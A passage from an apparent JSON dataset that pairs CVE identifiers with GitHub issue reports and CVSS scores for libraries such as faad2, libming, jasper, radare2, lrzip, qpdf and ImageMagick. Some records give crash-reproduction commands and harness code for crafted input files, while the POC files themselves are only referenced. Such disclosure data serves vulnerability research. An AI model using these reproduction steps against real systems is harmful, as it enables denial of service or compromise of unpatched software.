  89367. "Issue_Url_new": "https://github.com/urllib3/urllib3/issues/1316",
  89368. "Repo_new": "urllib3/urllib3",
  89369. "Issue_Created_At": "2018-01-17T01:02:04Z",
  89370. "description": "Auth header remains during redirects. Requests does it: URLTAG",
  89371. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89372. "severity": "CRITICAL",
  89373. "baseScore": 9.8,
  89374. "impactScore": 5.9,
  89375. "exploitabilityScore": 3.9
  89376. },
  89377. {
  89378. "CVE_ID": "CVE-2018-20195",
  89379. "Issue_Url_old": "https://github.com/knik0/faad2/issues/25",
  89380. "Issue_Url_new": "https://github.com/knik0/faad2/issues/25",
  89381. "Repo_new": "knik0/faad2",
  89382. "Issue_Created_At": "2018-12-17T06:25:35Z",
  89383. "description": "Null pointer dereference vulnerability in ic_predict APITAG Hi, i found a null pointer dereference bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function ic_predict .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  89384. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89385. "severity": "MEDIUM",
  89386. "baseScore": 5.5,
  89387. "impactScore": 3.6,
  89388. "exploitabilityScore": 1.8
  89389. },
  89390. {
  89391. "CVE_ID": "CVE-2018-20199",
  89392. "Issue_Url_old": "https://github.com/knik0/faad2/issues/24",
  89393. "Issue_Url_new": "https://github.com/knik0/faad2/issues/24",
  89394. "Repo_new": "knik0/faad2",
  89395. "Issue_Created_At": "2018-12-17T06:22:35Z",
  89396. "description": "Null pointer dereference vulnerability in APITAG Hi, i found a null pointer dereference bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function ifilter_bank.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  89397. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89398. "severity": "MEDIUM",
  89399. "baseScore": 5.5,
  89400. "impactScore": 3.6,
  89401. "exploitabilityScore": 1.8
  89402. },
  89403. {
  89404. "CVE_ID": "CVE-2018-20362",
  89405. "Issue_Url_old": "https://github.com/knik0/faad2/issues/26",
  89406. "Issue_Url_new": "https://github.com/knik0/faad2/issues/26",
  89407. "Repo_new": "knik0/faad2",
  89408. "Issue_Created_At": "2018-12-17T06:28:49Z",
  89409. "description": "Null pointer dereference vulnerability in ifilter_bank APITAG Hi, i found a null pointer dereference bug in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function ifilter_bank.the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  89410. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89411. "severity": "MEDIUM",
  89412. "baseScore": 5.5,
  89413. "impactScore": 3.6,
  89414. "exploitabilityScore": 1.8
  89415. },
  89416. {
  89417. "CVE_ID": "CVE-2018-20405",
  89418. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/354",
  89419. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/354",
  89420. "Repo_new": "bigtreecms/bigtree-cms",
  89421. "Issue_Created_At": "2018-12-21T06:22:47Z",
  89422. "description": "Information Disclosure APITAG Authentication). I found a information leakage vulnerabilities in APITAG CMS, you need to login the backstage first. Steps to reproduce: APITAG in to the backstage URLTAG APITAG some contents APITAG the page and see APITAG create and publish APITAG and update FILETAG FILETAG FILETAG This vulnerability reveals the full path of bigtree CMS Let's look at the code: FILETAG The parameters of post are not restricted,so it will be evali it in wrong\u3002",
  89423. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
  89424. "severity": "LOW",
  89425. "baseScore": 2.7,
  89426. "impactScore": 1.4,
  89427. "exploitabilityScore": 1.2
  89428. },
  89429. {
  89430. "CVE_ID": "CVE-2018-20426",
  89431. "Issue_Url_old": "https://github.com/libming/libming/issues/162",
  89432. "Issue_Url_new": "https://github.com/libming/libming/issues/162",
  89433. "Repo_new": "libming/libming",
  89434. "Issue_Created_At": "2018-09-21T08:39:32Z",
  89435. "description": "Null pointer dereference in APITAG (decompile.c). A null pointer dereference bug was found in function APITAG (in master version,not the issue NUMBERTAG CODETAG to reproduce it ,run swftopython with APITAG APITAG poc file URLTAG credit: APITAG of Venustech FILETAG",
  89436. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89437. "severity": "HIGH",
  89438. "baseScore": 8.8,
  89439. "impactScore": 5.9,
  89440. "exploitabilityScore": 2.8
  89441. },
  89442. {
  89443. "CVE_ID": "CVE-2018-20428",
  89444. "Issue_Url_old": "https://github.com/libming/libming/issues/161",
  89445. "Issue_Url_new": "https://github.com/libming/libming/issues/161",
  89446. "Repo_new": "libming/libming",
  89447. "Issue_Created_At": "2018-09-21T08:24:35Z",
  89448. "description": "Null pointer dereference in strlenext (decompile.c). A null pointer dereference bug was found in function APITAG ERRORTAG to reproduce it ,run swftopython with APITAG APITAG poc file URLTAG credit: APITAG of Venustech FILETAG",
  89449. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89450. "severity": "HIGH",
  89451. "baseScore": 8.8,
  89452. "impactScore": 5.9,
  89453. "exploitabilityScore": 2.8
  89454. },
  89455. {
  89456. "CVE_ID": "CVE-2018-20429",
  89457. "Issue_Url_old": "https://github.com/libming/libming/issues/160",
  89458. "Issue_Url_new": "https://github.com/libming/libming/issues/160",
  89459. "Repo_new": "libming/libming",
  89460. "Issue_Created_At": "2018-09-21T03:21:35Z",
  89461. "description": "Null pointer dereference in APITAG (decompile.c). A null pointer dereference bug was found in function APITAG ERRORTAG to reproduce it ,run swftophp with APITAG APITAG poc file URLTAG credit: APITAG of Venustech FILETAG",
  89462. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89463. "severity": "HIGH",
  89464. "baseScore": 8.8,
  89465. "impactScore": 5.9,
  89466. "exploitabilityScore": 2.8
  89467. },
  89468. {
  89469. "CVE_ID": "CVE-2018-20437",
  89470. "Issue_Url_old": "https://github.com/wuyouzhuguli/FEBS-Shiro/issues/40",
  89471. "Issue_Url_new": "https://github.com/wuyouzhuguli/febs-shiro/issues/40",
  89472. "Repo_new": "wuyouzhuguli/FEBS-Shiro",
  89473. "Issue_Created_At": "2018-11-05T06:27:16Z",
  89474. "description": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e. APITAG Shiro\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e\uff0c\u8be6\u7ec6\u4fe1\u606f\u5982\u4e0b\uff1a FILETAG APITAG FILETAG FILETAG NUMBERTAG FILETAG APITAG",
  89475. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  89476. "severity": "HIGH",
  89477. "baseScore": 7.5,
  89478. "impactScore": 3.6,
  89479. "exploitabilityScore": 3.9
  89480. },
  89481. {
  89482. "CVE_ID": "CVE-2018-20455",
  89483. "Issue_Url_old": "https://github.com/radare/radare2/issues/12373",
  89484. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12373",
  89485. "Repo_new": "radareorg/radare2",
  89486. "Issue_Created_At": "2018-12-02T15:20:44Z",
  89487. "description": "APITAG stack buffer overflow at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a0cfcdd commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error message. Actual behavior rasm2 crashes. ERRORTAG Steps to reproduce the behavior run APITAG",
  89488. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89489. "severity": "MEDIUM",
  89490. "baseScore": 5.5,
  89491. "impactScore": 3.6,
  89492. "exploitabilityScore": 1.8
  89493. },
  89494. {
  89495. "CVE_ID": "CVE-2018-20459",
  89496. "Issue_Url_old": "https://github.com/radare/radare2/issues/12418",
  89497. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12418",
  89498. "Repo_new": "radareorg/radare2",
  89499. "Issue_Created_At": "2018-12-05T16:26:17Z",
  89500. "description": "APITAG heap buffer overflow (OOB read) at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f2e NUMBERTAG c3 commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error message. Actual behavior rasm2 crashes. ERRORTAG Steps to reproduce the behavior compile radare with asan (tried O3/ O0) run APITAG FILETAG Additional Logs, screenshots, source code, configuration dump, ... Index j may reach length of str inside APITAG .",
  89501. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89502. "severity": "MEDIUM",
  89503. "baseScore": 5.5,
  89504. "impactScore": 3.6,
  89505. "exploitabilityScore": 1.8
  89506. },
  89507. {
  89508. "CVE_ID": "CVE-2018-20545",
  89509. "Issue_Url_old": "https://github.com/cacalabs/libcaca/issues/37",
  89510. "Issue_Url_new": "https://github.com/cacalabs/libcaca/issues/37",
  89511. "Repo_new": "cacalabs/libcaca",
  89512. "Issue_Created_At": "2018-12-29T03:23:35Z",
  89513. "description": "CVETAG . Following vulnerability has been reported to Red Hat issue tracker: CVETAG CVETAG ERRORTAG",
  89514. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89515. "severity": "HIGH",
  89516. "baseScore": 8.8,
  89517. "impactScore": 5.9,
  89518. "exploitabilityScore": 2.8
  89519. },
  89520. {
  89521. "CVE_ID": "CVE-2018-20570",
  89522. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/191",
  89523. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/191",
  89524. "Repo_new": "jasper-software/jasper",
  89525. "Issue_Created_At": "2018-12-28T07:22:38Z",
  89526. "description": "Heap buffer overflow in APITAG at jasper version NUMBERTAG and master branch. A crafted input will lead to heap buffer overflow failed in APITAG at jasper version NUMBERTAG and master branch Triggered by ./jasper output /dev/null output format jp2 input PATHTAG Poc FILETAG The ASAN information is as follows: ERRORTAG APITAG wu.an. EMAILTAG",
  89527. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89528. "severity": "MEDIUM",
  89529. "baseScore": 6.5,
  89530. "impactScore": 3.6,
  89531. "exploitabilityScore": 2.8
  89532. },
  89533. {
  89534. "CVE_ID": "CVE-2018-20622",
  89535. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/193",
  89536. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/193",
  89537. "Repo_new": "jasper-software/jasper",
  89538. "Issue_Created_At": "2018-12-31T06:29:37Z",
  89539. "description": "memory leaks in jpc_dec_decodepkts . hi,jasper team,when i convert jp2 file,i found a memory leak bug reported by APITAG the version is NUMBERTAG FILETAG ./jasper input jasper jpc_dec_decodepkts memory leak output /dev/null output format jp2 warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) warning: trailing garbage in marker segment NUMBERTAG bytes) alignment failed jpc_dec_decodepkts failed error: cannot decode code stream error: cannot load image data APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f9eb ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de8b1b0 ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f9eb ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f9eb ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f9eb ( PATHTAG NUMBERTAG f2b6de NUMBERTAG e5 ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de NUMBERTAG f ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de NUMBERTAG e5 ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f9eb ( PATHTAG NUMBERTAG f2b6de NUMBERTAG f ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de8b1b0 ( PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6df3c NUMBERTAG PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG f2b6de2f NUMBERTAG PATHTAG NUMBERTAG f2b6de NUMBERTAG c2 ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s).",
  89540. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89541. "severity": "MEDIUM",
  89542. "baseScore": 6.5,
  89543. "impactScore": 3.6,
  89544. "exploitabilityScore": 2.8
  89545. },
  89546. {
  89547. "CVE_ID": "CVE-2018-20756",
  89548. "Issue_Url_old": "https://github.com/modxcms/revolution/issues/14105",
  89549. "Issue_Url_new": "https://github.com/modxcms/revolution/issues/14105",
  89550. "Repo_new": "modxcms/revolution",
  89551. "Issue_Created_At": "2018-10-02T04:21:54Z",
  89552. "description": "Stored XSS via document resources. Create new document with pagetitle ERRORTAG XSS work in: Update Quick edit View manager logs",
  89553. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89554. "severity": "MEDIUM",
  89555. "baseScore": 6.1,
  89556. "impactScore": 2.7,
  89557. "exploitabilityScore": 2.8
  89558. },
  89559. {
  89560. "CVE_ID": "CVE-2018-20847",
  89561. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/431",
  89562. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/431",
  89563. "Repo_new": "uclouvain/openjpeg",
  89564. "Issue_Created_At": "2014-11-14T19:45:14Z",
  89565. "description": "Heap buffer overflow in opj_tcd_init_decode_tile. Originally reported on Google Code with ID NUMBERTAG ERRORTAG Reported by mayeut URLTAG on NUMBERTAG",
  89566. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89567. "severity": "HIGH",
  89568. "baseScore": 8.8,
  89569. "impactScore": 5.9,
  89570. "exploitabilityScore": 2.8
  89571. },
  89572. {
  89573. "CVE_ID": "CVE-2018-3769",
  89574. "Issue_Url_old": "https://github.com/ruby-grape/grape/issues/1762",
  89575. "Issue_Url_new": "https://github.com/ruby-grape/grape/issues/1762",
  89576. "Repo_new": "ruby-grape/grape",
  89577. "Issue_Created_At": "2018-05-22T22:25:38Z",
  89578. "description": "Default formatter error can cause XSS rendering issue. If you issue a request into an API endpoint with a format specified that is not handled, you get back a NUMBERTAG error with message APITAG requested format 'format' is not supported.' The name of the specified format is rendered in the error message, which defaults as HTML. You can easily craft a format value that gets passed in and renders as an XSS. An example: URLTAG Renders as html: The requested format APITAG APITAG ' is not supported. Which will cause a javascript popup if you visit this page in a browser.",
  89579. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89580. "severity": "MEDIUM",
  89581. "baseScore": 6.1,
  89582. "impactScore": 2.7,
  89583. "exploitabilityScore": 2.8
  89584. },
  89585. {
  89586. "CVE_ID": "CVE-2018-6013",
  89587. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/327",
  89588. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/327",
  89589. "Repo_new": "bigtreecms/bigtree-cms",
  89590. "Issue_Created_At": "2018-01-22T13:47:05Z",
  89591. "description": "Cross site Scripting in bigtreecms NUMBERTAG FILE: PATHTAG Vul Code: $parts = APITAG > APITAG = $part; > $directory = APITAG > APITAG APITAG APITAG APITAG POST PATHTAG xxx: xxx xxx: xxx xxx: xxx APITAG APITAG",
  89592. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  89593. "severity": "MEDIUM",
  89594. "baseScore": 5.4,
  89595. "impactScore": 2.7,
  89596. "exploitabilityScore": 2.3
  89597. },
  89598. {
  89599. "CVE_ID": "CVE-2018-6535",
  89600. "Issue_Url_old": "https://github.com/Icinga/icinga2/issues/4920",
  89601. "Issue_Url_new": "https://github.com/icinga/icinga2/issues/4920",
  89602. "Repo_new": "icinga/icinga2",
  89603. "Issue_Created_At": "2017-01-13T08:55:05Z",
  89604. "description": "APITAG NUMBERTAG Hash API password and use time constant password compares. This issue has been migrated from Redmine: URLTAG Created by jflach on NUMBERTAG Assignee: _jflach_ Status: APITAG Target Version: _(none)_ Last Update NUMBERTAG in Redmine)_ Backport?: Not yet backported Include in Changelog NUMBERTAG API user credentials are compared using the != operator on APITAG which maps directly to the != operator of std::string which is not guaranteed to be constant time and thus is likely vulnerable to timing attacks. An alternative to making the comparision time constant would be always save the API passwords hashed.",
  89605. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89606. "severity": "HIGH",
  89607. "baseScore": 8.1,
  89608. "impactScore": 5.9,
  89609. "exploitabilityScore": 2.2
  89610. },
  89611. {
  89612. "CVE_ID": "CVE-2018-9058",
  89613. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/93",
  89614. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/93",
  89615. "Repo_new": "ckolivas/lrzip",
  89616. "Issue_Created_At": "2018-03-27T03:22:20Z",
  89617. "description": "infinite loop in runzip_fd (src/runzip.c). On latest version APITAG and commit APITAG of lrzip, there is an infinite loop in runzip_fd function of src/runzip.c, which could be triggered by the POC below. The issue happens since the return value of runzip_chunk (line NUMBERTAG function could be manipulated to be NUMBERTAG In this case, total is always smaller than expected_size NUMBERTAG i NUMBERTAG runzip_fd(rzip_control control, int fd_in, int fd_out, int fd_hist, i NUMBERTAG expected_size NUMBERTAG do NUMBERTAG u = runzip_chunk(control, fd_in, expected_size, total NUMBERTAG total += u NUMBERTAG while (total APITAG eof NUMBERTAG return total NUMBERTAG To reproduce the issue, run: ./lrzip t $POC FILETAG The full stack trace is NUMBERTAG fe NUMBERTAG fb NUMBERTAG in _fxstat () from APITAG NUMBERTAG ae NUMBERTAG in fstat (__statbuf NUMBERTAG fffffffd2a0, __fd NUMBERTAG at PATHTAG NUMBERTAG runzip_chunk (tally NUMBERTAG expected_size=<optimized out>, fd_in=<optimized out>, control=<optimized out>) at PATHTAG NUMBERTAG runzip_fd APITAG APITAG , fd_in=fd_in APITAG fd_out=fd_out APITAG fd_hist=fd_hist APITAG expected_size=<optimized out>) at PATHTAG NUMBERTAG in decompress_file (control NUMBERTAG b4cc0 APITAG ) at PATHTAG NUMBERTAG in main (argc=<optimized out>, argv=<optimized out>) at PATHTAG",
  89618. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89619. "severity": "MEDIUM",
  89620. "baseScore": 5.5,
  89621. "impactScore": 3.6,
  89622. "exploitabilityScore": 1.8
  89623. },
  89624. {
  89625. "CVE_ID": "CVE-2018-9133",
  89626. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1072",
  89627. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1072",
  89628. "Repo_new": "imagemagick/imagemagick",
  89629. "Issue_Created_At": "2018-03-29T21:02:01Z",
  89630. "description": "Excessive iteration in APITAG and APITAG ( PATHTAG ). Version: APITAG NUMBERTAG Q NUMBERTAG Commit: APITAG OS: Linux test NUMBERTAG APITAG NUMBERTAG SMP Fri Feb NUMBERTAG UTC NUMBERTAG APITAG There is a excessive iteration in APITAG and APITAG function of PATHTAG file, which could be triggered by the POC below. The issue happens since APITAG and APITAG assume legitimate values of image >rows and image >columns. Once such values are manipulated to be large, imagemagick hangs: Imagemagick spends more than ten minutes to process the POC, which is only NUMBERTAG bytes. To reproduce the issue: run ./mogrify $POC POC is attached. FILETAG Stack trace when imagemagick is in APITAG loop NUMBERTAG fe NUMBERTAG f6ebac in APITAG APITAG APITAG at PATHTAG NUMBERTAG fe NUMBERTAG f NUMBERTAG in APITAG (image_info=<optimized out>, exception=<optimized out>) at PATHTAG NUMBERTAG fe NUMBERTAG c in APITAG APITAG APITAG at PATHTAG NUMBERTAG fe NUMBERTAG e5 in APITAG APITAG APITAG PATHTAG APITAG at PATHTAG NUMBERTAG fe NUMBERTAG a1dd6e in APITAG (image_info NUMBERTAG argc=<optimized out>, argv=<optimized out>, APITAG out>, exception=<optimized out>) at PATHTAG NUMBERTAG fe NUMBERTAG ea NUMBERTAG in APITAG APITAG command=<optimized out>, argc=argc APITAG argv=<optimized out>, metadata=<optimized out>, APITAG at PATHTAG NUMBERTAG in APITAG (argc NUMBERTAG argv=<optimized out>) at PATHTAG NUMBERTAG fe NUMBERTAG f8c2c NUMBERTAG in __libc_start_main () at PATHTAG NUMBERTAG ac2 in _start ()",
  89631. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89632. "severity": "MEDIUM",
  89633. "baseScore": 6.5,
  89634. "impactScore": 3.6,
  89635. "exploitabilityScore": 2.8
  89636. },
  89637. {
  89638. "CVE_ID": "CVE-2018-9918",
  89639. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/202",
  89640. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/202",
  89641. "Repo_new": "qpdf/qpdf",
  89642. "Issue_Created_At": "2018-04-10T10:00:25Z",
  89643. "description": "Segmentation Fault (stack overflow) on a crafted PDF file. A crafted pdf file causes a segmentation fault, stack overflow reported by LLVM APITAG causing a denial of service and there is a chance of code execution. FILETAG Details are attached inside the zip called 'gdb log'. I have tested with libqpdf and qpdf itself, debugged and used LLVM APITAG to identify the possible root cause. A pdf POC is inside the zip. Versions tested NUMBERTAG and NUMBERTAG c code to test: APITAG running: > == simple source code using libqpdf == > $ cat openpdf.cc > include APITAG > include APITAG > include APITAG > include APITAG > include APITAG > include APITAG > > int main(void) > { > int pageno NUMBERTAG try > { > QPDF pdf; > APITAG FILETAG \"); > APITAG pages = APITAG > if ((pageno NUMBERTAG static_cast APITAG (pageno) > APITAG > { > exit NUMBERTAG catch (std::exception& e) > { > return NUMBERTAG return NUMBERTAG clang NUMBERTAG PATHTAG lz ljpeg lqpdf lpthread .cc g o openpdf > $ ./openpdf > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > (...) > WARNING: FILETAG (trailer, offset NUMBERTAG unknown token while reading object; treating as string > WARNING: FILETAG (trailer, offset NUMBERTAG unexpected EOF > WARNING: FILETAG (trailer, offset NUMBERTAG parse error while reading object > Segmentation fault (core dumped) Testing qpdf NUMBERTAG pushdword MENTIONTAG qpdflib]$ qpdf FILETAG test.pdf > Segmentation fault (core dumped) > [pushdword MENTIONTAG qpdflib]$ qpdf version > qpdf version NUMBERTAG Copyright (c NUMBERTAG Jay Berkenbilt > This software may be distributed under the terms of version NUMBERTAG of the > Artistic License which may be found in the source distribution. It is > provided \"as is\" without express or implied warranty. testing qpdf NUMBERTAG qpdf FILETAG test.pdf > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > (... a very long warning repetition ...) > WARNING: FILETAG (trailer, offset NUMBERTAG expected dictionary key but found non name object; inserting key APITAG > WARNING: FILETAG (trailer, offset NUMBERTAG unknown token while reading object; treating as string > WARNING: FILETAG (trailer, offset NUMBERTAG unexpected EOF > WARNING: fuzzed.pdf (trailer, offset NUMBERTAG parse error while reading object > Segmentation fault (core dumped)",
  89644. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89645. "severity": "HIGH",
  89646. "baseScore": 7.8,
  89647. "impactScore": 5.9,
  89648. "exploitabilityScore": 1.8
  89649. },
  89650. {
  89651. "CVE_ID": "CVE-2019-10062",
  89652. "Issue_Url_old": "https://github.com/aurelia/framework/issues/992",
  89653. "Issue_Url_new": "https://github.com/aurelia/framework/issues/992",
  89654. "Repo_new": "aurelia/framework",
  89655. "Issue_Created_At": "2022-03-01T14:53:13Z",
  89656. "description": "npm audit warning for aurelia framework XSS vulnerability in default HTML sanitizer implementation. I'm submitting a security vulnerability audit report Library Version: aurelia framework NUMBERTAG Please tell us about your environment: Operating System: Windows NUMBERTAG N/A) Node Version NUMBERTAG LTS) NPM Version NUMBERTAG LTS) Aurelia CLI OR JSPM OR Webpack AND Version N/A Browser: N/A Language: all Current behavior: When installing Aurelia NUMBERTAG APITAG ) using npm , audit warnings are displayed, with reference to this vulnerability description URLTAG . The Aurelia products developed by my company are not really affected since we have implemented our own improved Aurelia APITAG package (stored on our internal npm repository). We use this as replacement for the default, limited sanitizer implementation included with APITAG (as recommended in your documentation pages). Our sanitizer package is a pure ESM package that works both in browser AND node (using jsdom ) environments, and it is configurable by \"allow listing\" html element names/attributes per element type, and also inline CSS style properties... CODETAG If it is of interest, I could ask if it is OK to make the source code for our sanitizer package public, so that you could review/test it. Then we could discuss making the package public, or if you prefer dissecting the code to make it an integral part of the aurelia framework source code, we could maybe \"donate\" the code for this purpose as well. I would need some confirmations from management first though. Whatever you prefer, I think something should be done to get rid of the vulnerability audit warnings. Awaiting reply. Expected/desired behavior: Aurelia NUMBERTAG should mitigate the vulnerability by including a better html sanitization feature to get rid of audit warnings when installed from npm repository.",
  89657. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89658. "severity": "MEDIUM",
  89659. "baseScore": 6.1,
  89660. "impactScore": 2.7,
  89661. "exploitabilityScore": 2.8
  89662. },
  89663. {
  89664. "CVE_ID": "CVE-2019-1010069",
  89665. "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/18",
  89666. "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/18",
  89667. "Repo_new": "lewdlime/abcm2ps",
  89668. "Issue_Created_At": "2018-04-13T18:42:10Z",
